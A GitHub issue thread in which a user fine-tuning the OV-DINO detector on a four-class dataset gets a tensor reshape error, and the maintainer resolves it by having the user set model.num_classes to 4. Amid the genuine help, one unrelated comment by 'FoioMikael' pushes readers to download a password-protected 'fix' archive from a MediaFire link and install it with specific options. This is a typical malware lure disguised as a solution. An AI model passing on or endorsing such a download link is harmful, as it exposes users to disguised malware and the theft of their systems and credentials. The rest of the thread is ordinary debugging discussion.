### ISSUE TITLE
RuntimeError: shape '[3, 150, -1]' is invalid for input of size 9216

### ISSUE THREAD

**Issue by Cloud65000** [wanghao9610/OV-DINO#28]
I used a customized dataset only containing 4 categories and set batch_size to 3. However, after I calculated the text_embed through BERT and ran the line"text_embed = text_embed.view(batch_size, num_classes, -1)", I encountered an error like this:
![image](https://github.com/user-attachments/assets/d91148be-0a10-489d-bb40-b2da5842600b)
I only used one GPU and ran the code in the "debug" format to learn the details of this algorithm. What can I do to solve this problem?

**Comment by wanghao9610** [comment]
@Cloud65000 The reson is you didn't change the num_class for model_config, you can get help from [here](https://github.com/wanghao9610/OV-DINO/blob/ac7ff9464e17372df94a35b11cd9cfdcd9f0a04f/ovdino/configs/common/data/custom_ovd.py#L33).

**Comment by wanghao9610** [comment]
@Cloud65000 I have updated the custom dataset fine-tuning instruction, I recommend you to read related instruction in [custom_ovd.py](ovdino/configs/common/data/custom_ovd.py). If you have any confusion, please let me know, I will fix it as soon as possible.

**Comment by Cloud65000** [comment]
Thanks for your soonest response. I can't open the custom_ovd.py you gave.
![image](https://github.com/user-attachments/assets/6cf4fddb-4e64-4cb6-aad9-4b115b3719e1)


> @Cloud65000 I have updated the custom dataset fine-tuning instruction, I recommend you to read related instruction in [custom_ovd.py](ovdino/configs/common/data/custom_ovd.py). If you have any confusion, please let me know, I will fix it as soon as possible.

Thanks for your prompt response, but I can't open the link you provided in this comment. Is this file under the path "/OV-DINO/ovdino/configs/common/data/custom_ovd.py"?
![image](https://github.com/user-attachments/assets/e8dbb3df-4d72-45d2-be82-f3b3c8b33155)

**Comment by wanghao9610** [comment]
@Cloud65000 Sorry, I update the comment.

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Cloud65000** [comment]
> @Cloud65000 The reson is you didn't change the num_class for model_config, you can get help from [here](https://github.com/wanghao9610/OV-DINO/blob/ac7ff9464e17372df94a35b11cd9cfdcd9f0a04f/ovdino/configs/common/data/custom_ovd.py#L33).

I followed the instructions written in the [custom_ovd.py](https://github.com/wanghao9610/OV-DINO/blob/main/ovdino/configs/common/data/custom_ovd.py) and uncommented corresponding codes, but the error still exists.
<img width="394" alt="7c0d8f86c56df752798c2d38c4b0126" src="https://github.com/user-attachments/assets/05ee1a97-01ac-4ff0-ace4-12ce1a42103a">
The num_classes equals 150, which seems to be the maximum number of prompted text. The number set in the custom_ovd.py seems to be the num_sampled_classes, not the num_classes.
<img width="128" alt="f616c1f7853960bd423dd070a54ad91" src="https://github.com/user-attachments/assets/d11ec12b-eac1-4a27-940c-f48d1efb1b37">

**Comment by Cloud65000** [comment]
And the shape of the text_embed before executing the view code remained to be like this 
![image](https://github.com/user-attachments/assets/0f71d128-a539-48fa-a61e-4964dae5eafb)
This is the same as the dimensions before changing the custom_ovd.py file.

**Comment by wanghao9610** [comment]
@

> > @Cloud65000 The reson is you didn't change the num_class for model_config, you can get help from [here](https://github.com/wanghao9610/OV-DINO/blob/ac7ff9464e17372df94a35b11cd9cfdcd9f0a04f/ovdino/configs/common/data/custom_ovd.py#L33).
> 
> I followed the instructions written in the [custom_ovd.py](https://github.com/wanghao9610/OV-DINO/blob/main/ovdino/configs/common/data/custom_ovd.py) and uncommented corresponding codes, but the error still exists. <img alt="7c0d8f86c56df752798c2d38c4b0126" width="394" src="https://private-user-images.githubusercontent.com/147381573/361715858-05ee1a97-01ac-4ff0-ace4-12ce1a42103a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NDc2NzgsIm5iZiI6MTcyNDc0NzM3OCwicGF0aCI6Ii8xNDczODE1NzMvMzYxNzE1ODU4LTA1ZWUxYTk3LTAxYWMtNGZmMC1hY2U0LTEyY2UxYTQyMTAzYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyN1QwODI5MzhaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT05OTNlMjRjNzA3YjE3MmY1OTJmOGRlNzVhOGRiOTEwY2I2M2IzOWY5NGEyMDIzM2Y3ZTgxMDVjYzA5MDYyYjdiJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.0pThzScDM5AsNjffgpLyf6yD7SMk_EXjCe7ExgbjoA0"> The num_classes equals 150, which seems to be the maximum number of prompted text. The number set in the custom_ovd.py seems to be the num_sampled_classes, not the num_classes. <img alt="f616c1f7853960bd423dd070a54ad91" width="128" src="https://private-user-images.githubusercontent.com/147381573/361716488-d11ec12b-eac1-4a27-940c-f48d1efb1b37.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NDc2NzgsIm5iZiI6MTcyNDc0NzM3OCwicGF0aCI6Ii8xNDczODE1NzMvMzYxNzE2NDg4LWQxMWVjMTJiLWVhYzEtNGEyNy05NDBjLWY0OGQxZWZiMWIzNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyN1QwODI5MzhaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yNTY0ZDIyNTRmODFiNGEzZjYxODBmNmZiODk2MGQwMDEyNTVmMjNiOTg3NDNiZjQwZWFmNGY1MmNkMGE0ZWRjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.8PJC45FZY_S7b4Xm7hxbiX1b1FVPKuiJcM-l-MEhGUk">

Change [Here](https://github.com/wanghao9610/OV-DINO/blob/ac7ff9464e17372df94a35b11cd9cfdcd9f0a04f/ovdino/projects/ovdino/configs/ovdino_swin_tiny224_bert_base_ft_custom_24ep.py#L37) to "model.num_classes = 4" .

**Comment by wanghao9610** [comment]
> And the shape of the text_embed before executing the view code remained to be like this ![image](https://private-user-images.githubusercontent.com/147381573/361718047-0f71d128-a539-48fa-a61e-4964dae5eafb.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NDc2NzgsIm5iZiI6MTcyNDc0NzM3OCwicGF0aCI6Ii8xNDczODE1NzMvMzYxNzE4MDQ3LTBmNzFkMTI4LWE1MzktNDhmYS1hNjFlLTQ5NjRkYWU1ZWFmYi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyN1QwODI5MzhaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT05OGY0MzkwZTNkZGQ3OTMzMDJhMjk5OTc5OGJlMmRjNWNiZjQyMDgxOWE1ODMzMTA1M2RlMTQ5NGU5MTI3MzM0JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.OPmmUGoLWAIOTAkAD9oDlrRgDa-ihqhXm_aV7SfUKFk) This is the same as the dimensions before changing the custom_ovd.py file.

It will flatten the batch_size and num_classes dimensions, in your case that is 3 x 4 = 12.

**Comment by Cloud65000** [comment]
> @
> 
> > > @Cloud65000 The reson is you didn't change the num_class for model_config, you can get help from [here](https://github.com/wanghao9610/OV-DINO/blob/ac7ff9464e17372df94a35b11cd9cfdcd9f0a04f/ovdino/configs/common/data/custom_ovd.py#L33).
> > 
> > 
> > I followed the instructions written in the [custom_ovd.py](https://github.com/wanghao9610/OV-DINO/blob/main/ovdino/configs/common/data/custom_ovd.py) and uncommented corresponding codes, but the error still exists. <img alt="7c0d8f86c56df752798c2d38c4b0126" width="394" src="https://private-user-images.githubusercontent.com/147381573/361715858-05ee1a97-01ac-4ff0-ace4-12ce1a42103a.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NDc2NzgsIm5iZiI6MTcyNDc0NzM3OCwicGF0aCI6Ii8xNDczODE1NzMvMzYxNzE1ODU4LTA1ZWUxYTk3LTAxYWMtNGZmMC1hY2U0LTEyY2UxYTQyMTAzYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyN1QwODI5MzhaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT05OTNlMjRjNzA3YjE3MmY1OTJmOGRlNzVhOGRiOTEwY2I2M2IzOWY5NGEyMDIzM2Y3ZTgxMDVjYzA5MDYyYjdiJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.0pThzScDM5AsNjffgpLyf6yD7SMk_EXjCe7ExgbjoA0"> The num_classes equals 150, which seems to be the maximum number of prompted text. The number set in the custom_ovd.py seems to be the num_sampled_classes, not the num_classes. <img alt="f616c1f7853960bd423dd070a54ad91" width="128" src="https://private-user-images.githubusercontent.com/147381573/361716488-d11ec12b-eac1-4a27-940c-f48d1efb1b37.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3NDc2NzgsIm5iZiI6MTcyNDc0NzM3OCwicGF0aCI6Ii8xNDczODE1NzMvMzYxNzE2NDg4LWQxMWVjMTJiLWVhYzEtNGEyNy05NDBjLWY0OGQxZWZiMWIzNy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODI3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgyN1QwODI5MzhaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0yNTY0ZDIyNTRmODFiNGEzZjYxODBmNmZiODk2MGQwMDEyNTVmMjNiOTg3NDNiZjQwZWFmNGY1MmNkMGE0ZWRjJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.8PJC45FZY_S7b4Xm7hxbiX1b1FVPKuiJcM-l-MEhGUk">
> 
> Change [Here](https://github.com/wanghao9610/OV-DINO/blob/ac7ff9464e17372df94a35b11cd9cfdcd9f0a04f/ovdino/projects/ovdino/configs/ovdino_swin_tiny224_bert_base_ft_custom_24ep.py#L37) to "model.num_classes = 4" .

Thanks a lot. I solved the problem. Originally eager to learn ovdino, I wrote a configuration file by directly imitating the file "ovdino_swin_tiny224_bert_base_eval_coco.py", hence the error.
